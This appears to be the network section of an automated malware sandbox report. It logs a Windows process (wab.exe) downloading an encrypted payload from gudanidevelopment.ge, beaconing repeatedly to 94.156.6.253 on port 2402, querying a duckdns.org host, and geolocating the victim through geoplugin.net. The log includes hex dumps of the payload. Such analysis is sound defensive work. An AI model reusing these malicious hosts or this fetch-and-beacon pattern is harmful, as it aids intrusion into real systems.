                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.582305908 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:03.871537924 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:04.641171932 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:04.642009974 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.041110992 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.281486034 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.281517029 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.281878948 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.281939030 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.282046080 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.282073975 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.282092094 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.522418976 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.522480011 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.522521019 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.524573088 CET24025007894.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:07.524902105 CET500782402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:34.104387999 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:20:34.154172897 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:34.161937952 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:20:34.465284109 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:21:04.939312935 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:21:04.941483974 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:21:05.246601105 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:21:35.330044985 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:21:35.331995964 CET500772402192.168.11.2094.156.6.253
                                                                                                                                                                                                                    Oct 31, 2023 13:21:35.621479034 CET24025007794.156.6.253192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:21:46.450952053 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:21:46.450979948 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:21:47.075664043 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:21:47.216465950 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:21:48.325375080 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:21:48.747348070 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:21:50.809257984 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:21:51.809087038 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:21:55.761347055 CET5007980192.168.11.20178.237.33.50
                                                                                                                                                                                                                    Oct 31, 2023 13:21:57.917234898 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:22:05.649815083 CET5007980192.168.11.20178.237.33.50
Oct 31, 2023 13:22:06.523335934 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:22:06.525604010 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:22:06.824621916 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:22:10.133265018 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:22:25.426831961 CET | 50079 | 80 | 192.168.11.20 | 178.237.33.50
Oct 31, 2023 13:22:34.565249920 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:22:37.310493946 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:22:37.312127113 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:22:37.605865002 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:23:07.851360083 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:23:07.853389025 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:23:08.152753115 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:23:38.214320898 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:23:38.216645002 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:23:38.512367010 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:24:09.136153936 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:24:09.138408899 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:24:09.434351921 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:24:39.971849918 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:24:39.974123001 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:24:40.262222052 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:25:10.605273008 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:25:10.656177998 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:25:10.671134949 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:25:10.965154886 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:25:41.173505068 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:25:41.222810030 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:25:41.512216091 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:26:11.604234934 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:26:11.638946056 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:26:11.934181929 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:26:42.324208975 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:26:42.370409966 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:26:42.374356985 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:26:42.668397903 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:27:12.894659996 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:27:12.941951036 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:27:12.947561026 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:27:13.231059074 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:27:43.603663921 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Oct 31, 2023 13:27:43.653831959 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:27:43.655474901 CET | 50077 | 2402 | 192.168.11.20 | 94.156.6.253
Oct 31, 2023 13:27:43.949686050 CET | 2402 | 50077 | 94.156.6.253 | 192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2023 13:19:56.488696098 CET | 61576 | 53 | 192.168.11.20 | 1.1.1.1
Oct 31, 2023 13:19:57.490148067 CET | 53 | 61576 | 1.1.1.1 | 192.168.11.20
Oct 31, 2023 13:19:57.490875006 CET | 61576 | 53 | 192.168.11.20 | 9.9.9.9
Oct 31, 2023 13:19:57.620471954 CET | 53 | 61576 | 9.9.9.9 | 192.168.11.20
Oct 31, 2023 13:20:00.230863094 CET | 54004 | 53 | 192.168.11.20 | 1.1.1.1
Oct 31, 2023 13:20:00.407125950 CET | 53 | 54004 | 1.1.1.1 | 192.168.11.20
Oct 31, 2023 13:20:01.157284975 CET | 64412 | 53 | 192.168.11.20 | 1.1.1.1
Oct 31, 2023 13:20:01.308345079 CET | 53 | 64412 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2023 13:19:56.488696098 CET | 192.168.11.20 | 1.1.1.1 | 0x3016 | Standard query (0) | gudanidevelopment.ge | A (IP address) | IN (0x0001) | false
Oct 31, 2023 13:19:57.490875006 CET | 192.168.11.20 | 9.9.9.9 | 0x3016 | Standard query (0) | gudanidevelopment.ge | A (IP address) | IN (0x0001) | false
Oct 31, 2023 13:20:00.230863094 CET | 192.168.11.20 | 1.1.1.1 | 0x5e12 | Standard query (0) | ourt2949aslumes9.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 31, 2023 13:20:01.157284975 CET | 192.168.11.20 | 1.1.1.1 | 0xc409 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2023 13:19:57.490148067 CET | 1.1.1.1 | 192.168.11.20 | 0x3016 | No error (0) | gudanidevelopment.ge | | 217.147.225.69 | A (IP address) | IN (0x0001) | false
Oct 31, 2023 13:19:57.620471954 CET | 9.9.9.9 | 192.168.11.20 | 0x3016 | Name error (3) | gudanidevelopment.ge | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2023 13:20:00.407125950 CET | 1.1.1.1 | 192.168.11.20 | 0x5e12 | Name error (3) | ourt2949aslumes9.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2023 13:20:01.308345079 CET | 1.1.1.1 | 192.168.11.20 | 0xc409 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• gudanidevelopment.ge
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 50076 | 217.147.225.69 | 80 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | kBytes transferred | Direction | Data
Oct 31, 2023 13:19:57.803142071 CET | 8 | OUT | GET /IogvoayYhe139.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Host: gudanidevelopment.ge
Cache-Control: no-cache
Oct 31, 2023 13:19:58.107784033 CET | 9 | IN | HTTP/1.1 200 OK
Date: Tue, 31 Oct 2023 12:19:57 GMT
Server: Apache
Last-Modified: Thu, 26 Oct 2023 08:16:56 GMT
Accept-Ranges: bytes
Content-Length: 494656
Cache-Control: s-maxage=10
Content-Type: application/octet-stream
Data Raw: 58 bc 9a 79 03 af 7f af 05 ca 76 8e 7b aa 66 c3 7b 56 3a 03 c8 ff 2a 61 e6 69 58 3a c9 e6 54 f5 ab f0 61 e6 74 59 53 7f c4 22 b6 05 f3 13 de 2b f3 df 32 a6 1d 7c 4f 02 49 39 5d 98 f1 78 4d 31 6a 70 23 2f a7 76 a0 17 65 98 e4 ed 74 81 9b 8f d0 af dd 9a eb 62 67 78 eb 6f d5 6c 87 c1 d6 b4 02 69 2a 73 04 45 b3 35 c5 95 40 72 44 ec 4c 49 a6 ec 5d 73 34 b8 37 e9 a1 88 ae ba 71 be b0 de 83 34 1a 3e 2c c7 69 eb c5 73 c6 bd 21 d5 65 08 5a 98 c8 83 7f 96 84 d7 f5 02 ff ff a9 49 94 fa 3e 18 bb 3f 4c e9 45 a0 c8 7b aa cb 70 7a c8 8a 15 09 5b 14 46 33 81 5f 8f 05 dc 68 7d 0a c8 68 68 42 e2 e3 ca 70 26 3b 0b 4e 49 d2 86 5f 01 b8 4b 72 ef 27 b1 ca 49 02 ef df a0 29 fb 90 60 3f 81 32 52 19 5e 77 4a 55 8e cf ad e0 22 8f a2 6d ce 89 d1 22 1f b5 88 dc 8d ff 42 8f d8 04 b0 d3 e8 13 bc 63 b7 b2 cf 72 e5 8a ac 7c 65 ab 97 c1 a0 64 b4 8f 21 05 52 74 d2 87 f8 94 ad 1f 94 46 3c f5 3a be 76 07 2c 59 c2 1a 5d d0 86 83 d6 8d 97 bd 98 f6 ff bc 29 c3 99 9d 1d 31 31 ea 9a c9 21 2f 7c 0a b9 40 5d b6 13 fe 06 4d 06 46 df 34 46 5f 02 db 3c 19 8b ee e0 41 50 bf c9 aa 41 04 40 33 e1 23 bb f9 d7 85 5c 9c 6f 28 26 f9 30 0d e2 ca 65 58 df 25 51 32 0d 34 33 7c 80 6e 89 46 d6 39 ea 7f 59 cb 4d 46 cc 87 c2 32 70 21 bf 10 9c fa 1c d4 5f 90 32 9e fa fd c4 02 07 36 bf a3 e0 aa 29 79 57 0b cf b6 fd 2b e4 6e 8f d6 9e 6e 07 f6 44 90 7f 2f 3c ee 3e 41 ca 5a 41 b4 b7 dc 61 56 8f 54 e3 a8 a6 9c 9a dc 0a 66 66 49 af 18 61 34 87 a5 00 cd f3 73 40 dd 9b 13 11 73 4b f2 17 23 bf 78 d4 f5 6b 18 6d 4f 7d 4e 9e e3 3e dc 0d a8 32 84 6d d8 98 05 25 a4 58 55 83 b9 61 5f 67 86 55 59 ed fa 80 62 86 36 b3 71 6c 02 00 d1 78 42 0a 59 55 74 3e fd 19 98 5f 44 be d3 51 c6 e2 5f e0 69 34 a7 96 11 10 01 e9 b1 1a 78 b3 f8 02 36 3b 5f 20 80 44 af 0f 9a 3c c0 94 27 91 93 1e 15 ed 77 50 d4 90 79 e8 13 96 cd a1 32 72 51 7b bb b2 5c b3 b6 f8 df e9 6e 11 7b dc 3e 4e 39 ad 4f e4 21 0c 1e e5 37 64 95 ff bc 49 eb 98 aa e5 07 31 58 98 c0 76 61 36 17 69 54 21 73 84 ce 14 3d 3a e0 ac 76 8b 98 4f 3b 60 e8 c1 bc 5e c3 11 6b 04 16 69 27 bd 31 43 97 e7 a2 17 c2 d9 db 79 0c b9 d5 9b 49 4a 32 83 80 77 b0 a1 dd 73 3d 02 14 c4 89 c9 52 1e 4c 92 70 3d d5 50 bd ea 79 cc 5a 19 05 89 ee c0 b2 ca fe a1 d7 dc dc 1c f4 d4 79 ac a8 9b cc f0 51 51 e4 3d 2b 8d 04 e3 ac 83 1e f8 77 9c 3f f8 5f 34 d2 82 2a e2 08 b8 b0 e0 88 4d 42 48 0b 26 69 94 ee 87 f5 f3 bc c4 8e 6b 34 5f 27 b6 d4 fd 49 9c 9c e8 33 25 e7 ba 57 e4 c6 83 bb 03 6c 67 07 1c 7d 63 63 ce 3a ac 24 83 99 ed db 79 8d fb c5 6b f2 e5 4c 60 43 0c 55 56 0c 93 96 ac 0b ea 37 01 cf 22 5f ef c0 b4 85 25 3c 27 10 19 35 c0 32 f0 1a 08 28 17 71 76 be 81 2c 0b 04 b2 f9 55 18 e2 7d 9a 9b a0 3f 7b eb ad 83 d5 30 b9 cf a9 6f 03 ec 5c 2a a9 e4 af e5 41 cf 36 c9 53 36 cb a4 e6 64 dc de 76 0f 0d ae 30 2c 6b 21 14 96 2c 8c 82 78 eb 51 b3 3c ab cb 14 e5 08 14 6c f5 ac 61 82 54 48 bf f5 d7 4c 4e 21 19 9d 21 bd 17 0d 11 80 e9 fd 89 d8 80 77 a0 ae 08 44 a0 6e a4 c8 3a c2 6d ab 7a 48 e0 48 46 2a 8a 2f fa b2 e9 20 a0 5d 96 2f 23 fa df cb 07 83 93 0e ce 6e 33 73 47 30 7b 76 0c 7a 5f 24 42 90 84 32 08 5e 36 d3 63 7b 38 e8 a5 ce d5 cc c6 de f9 ab e1 58 14 e3 c2 40 c2 03 6e 56 18 f1 4c a5 63 22 83 0c 36 d8 2f 97 03 29 d5 b6 a0 b0 13 6e 03 2e c1 aa ff ec 9a 4e 8c 4b 53 ed 26
Data Ascii: Xyv{f{V:*aiX:TatYS"+2|OI9]xM1jp#/vetbgxoli*sE5@rDLI]s47q4>,is!eZI>?LE{pz[F3_h}hhBp&;NI_Kr'I)`?2R^wJU"m"Bcr|ed!RtF<:v,Y])11!/|@]MF4F_<APA@3#\o(&0eX%Q243|nF9YMF2p!_26)yW+nnD/<>AZAaVTffIa4s@sK#xkmO}N>2m%XUa_gUYb6qlxBYUt>_DQ_i4x6;_ D<'wPy2rQ{\n{>N9O!7dI1Xva6iT!s=:vO;`^ki'1CyIJ2ws=RLp=PyZyQQ=+w?_4*MBH&ik4_'I3%Wlg}cc:$ykL`CUV7"_%<'52(qv,U}?{0o\*A6S6dv0,k!,xQ<laTHLN!!wDn:mzHHF*/ ]/#n3sG0{vz_$B2^6c{8X@nVLc"6/)n.NKS&
Oct 31, 2023 13:19:58.107846022 CET | 11 | IN | Data Raw: 66 ae eb 59 4a ae a6 0b c8 e5 25 6c 01 5c b6 b4 b9 c5 30 10 4f 66 1a e6 84 cd c9 64 04 7e 68 d6 37 22 e2 ee 16 5d 77 1c 22 b5 2b 54 42 c3 ee 1a 1c cc db fc 1e 91 93 e9 53 1e 52 29 57 a0 10 57 ea d9 9f cf 0c 58 c3 46 c0 e7 cf 11 ec ba cf ca 98 e0
Data Ascii: fYJ%l\0Ofd~h7"]w"+TBSR)WWXFSXyb4MZq>0+ye$sE#149QYUEo9&0(nWI_z)v2#_2D<2L@ai9h2<}{$0a"_R:1q:+
Oct 31, 2023 13:19:58.107980013 CET | 12 | IN | Data Raw: d5 2c 18 85 9d 47 4d 26 b0 ad 5c 08 7b dc 48 64 db 98 5c e6 cc c5 d5 c6 b9 89 9f 56 85 55 00 2e 92 27 e2 17 e5 5d c5 45 01 00 88 c3 f9 bd d9 50 74 d6 55 28 9b 5f 1d 7d 6a 81 e7 a5 cf 0d 91 f4 a0 96 79 ab 81 ac b1 f2 ea 82 fb 02 6f f8 93 ec 4c 88
Data Ascii: ,GM&\{Hd\VU.']EPtU(_}jyoLcVX]_+(P)^VV]_1<*U_=iR;-j[=\||+,p)6!k3k*PU(,x6uS$)SNy*pI>M$$va8A""o_<X/
Oct 31, 2023 13:19:58.108088017 CET | 13 | IN | Data Raw: f4 53 a9 bf a8 2e b4 60 17 2d 48 59 92 f8 bf 94 2d 3d ec 3f ee 65 8b 8c 07 55 ed af 5b 90 ea 80 47 85 31 f5 b6 99 5e b1 cb 20 5f 77 e6 66 81 2f af 76 91 86 4d fc b4 44 25 2c b3 35 90 30 e9 80 eb 84 05 03 4f 26 48 af f7 ca d0 54 0c 2e 02 25 af c9
Data Ascii: S.`-HY-=?eU[G1^ _wf/vMD%,50O&HT.%F6{8CxM)1d|[m9^PrAxR)Z!QG/0vn7h`<Cl45#h}]sP4`1&3<(bpbL9,Kc/i
Oct 31, 2023 13:19:58.108251095 CET | 15 | IN | Data Raw: 1c 34 f9 6a 6c d1 16 f1 ac 20 0c aa c3 86 2e f9 bb 54 21 04 24 1e fb 48 8c 9b 89 6d 5b 21 d0 3d d9 c5 00 60 57 ce df 8a 6e 63 79 81 7d 32 7a 02 6f 97 f6 c2 32 b5 e7 03 cd 7b b6 51 c2 9e 80 6b 94 92 46 fc f3 94 ce b8 7e 91 94 50 9e c1 9e 26 7b 5c
Data Ascii: 4jl .T!$Hm[!=`Wncy}2zo2{QkF~P&{\b'<>[Tbwu}>r!1{anvE%-8Skx(zGVzRb!^5d!xfTRa23`1&zG>]`1}[Z0pBw}vo|)<{d0{<
Oct 31, 2023 13:19:58.108309031 CET | 16 | IN | Data Raw: 6d e1 10 05 15 f7 db eb 49 1e f4 fc 9e 07 94 4f 3b 39 b8 d4 54 5d 71 c0 f0 e6 a6 04 ac be ba b9 8a b7 5d 63 f6 ca 33 8b ff 46 2a 10 71 a4 4d 80 80 77 ed fa 56 bd d5 58 17 c4 89 76 26 3a 80 37 ca 96 a6 5f bd ea 79 2d 4d 1c 05 89 c0 05 ba ca 14 e1
Data Ascii: mIO;9T]q]c3F*qMwVXv&:7_y-M"/'Ys+o5 WlNsw[1f}>_ejE3u013|ffUk\((khas}-$_8b{qv;*9?ox"
Oct 31, 2023 13:19:58.108365059 CET | 17 | IN | Data Raw: ac d4 4c d0 9d 46 d3 04 ea 57 0c df 72 81 64 04 a7 50 ed cc 03 fb 64 78 ab 84 e7 ec fb e5 c6 b4 76 76 a9 8d 14 36 a9 be 0a 7d 53 8b bb 13 c7 86 2d ec 66 83 3b fa f1 b9 cb 89 46 29 83 40 4f 35 81 ae 56 45 26 25 eb e9 0c db c7 f1 ec 71 c7 3f 3c 7e
Data Ascii: LFWrdPdxvv6}S-f;F)@O5VE&%q?<~(M crqyn1dEIdb#qN#~51^_*\iX&9knJBP\%a`g+ESRs`AoDQi<LY$(mmrVPX=U
Oct 31, 2023 13:19:58.108647108 CET | 19 | IN | Data Raw: db 2a 49 a5 e9 17 80 12 3d 74 a2 bf b4 0c c9 96 45 0c b7 c8 89 20 1d c1 0d cf be b4 88 f5 55 59 0f 9b c0 a5 6c 2a 45 d6 e7 fb 07 b3 cf 9b d9 b4 b1 45 30 7b 8b 50 83 ea 87 e5 32 cf 39 46 8d d8 67 09 bb 7d 12 27 9e 2f a1 06 c7 ed c1 7b 05 b6 e8 a6
Data Ascii: *I=tE UYl*EE0{P29Fg}'/{g+Z9rdtjygz8dA`*QCB/$Gz{KXZz]hf3B)Y@U;I}t =ML4u-t_ZCDE%_^d8Rd
Oct 31, 2023 13:19:58.108712912 CET | 20 | IN | Data Raw: 18 45 07 35 c0 8b 53 8e fc 60 07 4c ba ad 8b 71 c8 54 db 68 a6 60 9e 69 dd 76 88 7f 1a 67 4c 20 43 5c 98 35 6e 1e 93 c3 68 ea 67 34 b1 2a 0f 62 6d bf 6d 44 00 27 10 49 e8 82 ce 7b d4 58 c0 66 80 89 41 d1 a1 46 0c 1a b5 55 5a e2 2d 11 55 48 e7 78
Data Ascii: E5S`LqTh`ivgL C\5nhg4*bmmD'I{XfAFUZ-UHxn2*6Peg!2$l7CQhO%+< ,G}@PHV(!BsG_Iuq|m~i[7|l%6g-x^C6[68^='v
Oct 31, 2023 13:19:58.108767986 CET | 22 | IN | Data Raw: 7d 33 d8 58 67 ba 45 07 94 61 6b be ea d7 b1 6b 33 72 eb 0f 87 c6 32 76 1f 9f 88 ec 73 97 e7 40 6d a7 83 7f ff a4 17 34 ee 75 ab f8 8d ad 9d e3 52 17 91 ca 35 70 26 c1 77 51 c9 71 61 b3 02 0e e7 33 d4 5c a5 17 2c 61 41 0c 6d c8 56 ae 6d 9d 16 e5
Data Ascii: }3XgEakk3r2vs@m4uR5p&wQqa3\,aAmVmrks$FmkU5yP?Z1//q1Xv0E:u\zaM^ZZ<G9*P%eq&<5>{3f9a>o%ere]H#b@
Oct 31, 2023 13:19:58.411365986 CET | 23 | IN | Data Raw: 59 f7 86 e2 f2 48 a3 f4 ed 66 4f 57 ad ee e6 23 21 ef 33 9e 8c 28 4e 0b dd 59 46 9a 10 20 12 f2 72 7d b5 67 0d 84 03 d9 7b 79 9a 81 a2 d6 07 e2 c6 77 4c e3 01 55 b1 5b 98 12 63 4a 48 d4 55 28 7e 22 8c fc 54 b5 87 fb 52 b5 f4 63 44 3a ac ef fa fa
Data Ascii: YHfOW#!3(NYF r}g{ywLU[cJHU(~"TRcD:A9!w}?_nmG?-Rb+LUimI}1" aoXMz!\pMR281pqS3H#s'owm/8H)BF~9=!X Y


                                                                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                                                    1 | 192.168.11.20 | 50079 | 178.237.33.50 | 80 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.559552908 CET | 534 | OUT | GET /json.gp HTTP/1.1
                                                                                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Oct 31, 2023 13:20:01.818048000 CET | 540 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    date: Tue, 31 Oct 2023 12:20:01 GMT
                                                                                                                                                                                                                    server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    content-length: 958
                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 32 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 46 4c 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 
5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 32 35 2e 37 36 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 30 2e 31 39 34 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 